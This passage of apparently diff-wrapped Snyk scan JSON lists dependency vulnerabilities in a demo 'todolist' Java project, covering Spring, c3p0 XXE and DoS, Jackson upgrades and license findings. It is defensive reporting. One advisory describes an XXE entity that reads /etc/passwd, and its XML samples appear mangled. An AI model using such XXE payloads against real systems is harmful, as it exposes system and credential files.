"3.1", + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "description": "## 
Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n", + "epssDetails": { + "percentile": "0.75300", + "probability": "0.00449", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22970" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-05-12T08:45:35.744127Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-05-12T08:17:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-05-12T09:49:10.833602Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:48.407397Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "title": "Improper Handling 
of Case Sensitivity", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.2.21)", + "[5.3.0, 5.3.19)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "5.2.21", + "5.3.19" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "low", + "cvssScore": 3.7, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-context", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28333", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/MarcinGadz/spring-rce-poc", + "title": "PoC" + }, + { + "url": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", + "title": "Spring Blog Post" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22968", + "title": "Tanzu Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:26.822810Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "assigner": "Snyk", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.233852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + 
"modificationTime": "2024-03-11T09:47:26.822810Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n", + "epssDetails": { + "percentile": "0.29205", + "probability": "0.00065", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22968" + ], + "CWE": [ + "CWE-178" + ] + }, + "packageName": "org.springframework:spring-context", + "proprietary": false, + "creationTime": "2022-04-14T11:54:10.207823Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-04-14T11:43:54Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": 
"spring-context" + }, + "publicationTime": "2022-04-14T12:09:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:16.458425Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.springframework:spring-context", + "version": "3.2.6.RELEASE", + "severityWithCritical": "low" + }, + { + "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.5.4,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.aspectj:aspectjweaver", + "creationTime": "2024-06-18T21:24:04.112Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T21:24:04.112Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.aspectj:aspectjweaver@1.8.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.aspectj:aspectjweaver", + "version": "1.8.2", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[4.0.0.CR1,)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.hibernate.common:hibernate-commons-annotations", + "creationTime": "2024-06-18T11:03:46.980Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:03:46.980Z", + "severity": "medium", + "from": [ + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate.common:hibernate-commons-annotations", + "version": "4.0.5.Final", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.0.0.Final,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "creationTime": "2024-06-18T12:03:42.953Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T12:03:42.953Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "version": "1.0.0.Final", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.5.0.Beta-1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-entitymanager", + "creationTime": "2024-06-18T11:52:01.913Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:52:01.913Z", + "severity": "medium", + "from": [ + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-entitymanager@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-entitymanager", + "version": "4.3.7.Final", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.jboss.logging:jboss-logging:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[3.0.1.GA, 3.1.2.GA)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.jboss.logging:jboss-logging", + "creationTime": "2024-06-18T02:47:02.411Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:47:02.411Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final", + "org.jboss.logging:jboss-logging@3.1.0.CR2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.jboss.logging:jboss-logging", + "version": "3.1.0.CR2", + "severityWithCritical": "medium" + } + ], + "upgrade": { + "com.fasterxml.jackson.core:jackson-core@2.6.5": { + "upgradeTo": "com.fasterxml.jackson.core:jackson-core@2.8.6", + "upgrades": [ + "com.fasterxml.jackson.core:jackson-core@2.6.5", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "vulns": [ + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520" + ] + }, + "com.fasterxml.jackson.core:jackson-databind@2.6.5": { + "upgradeTo": "com.fasterxml.jackson.core:jackson-databind@2.12.7.1", + "upgrades": [ + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + 
"com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + 
"com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "vulns": [ + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", + 
"SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", + 
"SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573" + ] + }, + "commons-collections:commons-collections@3.1": { + "upgradeTo": "commons-collections:commons-collections@3.2.2", + "upgrades": [ + "commons-collections:commons-collections@3.1", + "commons-collections:commons-collections@3.1", + "commons-collections:commons-collections@3.1" + ], + "vulns": [ + "SNYK-JAVA-COMMONSCOLLECTIONS-30078", + "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "SNYK-JAVA-COMMONSCOLLECTIONS-6056408" + ] + }, + "org.hibernate:hibernate-validator@4.3.1.Final": { + "upgradeTo": "org.hibernate:hibernate-validator@6.0.23.Final", + "upgrades": [ + "org.hibernate:hibernate-validator@4.3.1.Final", + "org.hibernate:hibernate-validator@4.3.1.Final", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "vulns": [ + "SNYK-JAVA-ORGHIBERNATE-30098", + "SNYK-JAVA-ORGHIBERNATE-568162", + "SNYK-JAVA-ORGHIBERNATE-569100" + ] + } + }, + "patch": {}, + "ignore": {}, + "pin": {} + }, + "filesystemPolicy": false, + "filtered": { + "ignore": [], + "patch": [] + }, + "uniqueCount": 99, + "projectName": "io.github.snyk:todolist-web-common", + "foundProjectCount": 7, + "displayTargetFile": "todolist-goof/todolist-web-common/pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof" + }, + { + "vulnerabilities": [ + { + "id": "SNYK-JAVA-C3P0-461017", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": 
{ + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:45.369849Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with 
JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", + "epssDetails": { + "percentile": "0.78365", + "probability": "0.00585", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-20433" + ], + "CWE": [ + "CWE-611" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:17:58.383761Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-12-24T13:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-07-21T14:22:18Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:09.230623Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": 
"SNYK-JAVA-C3P0-461018", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://hackerone.com/reports/509315", + "title": "POC: Hackerone Report" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 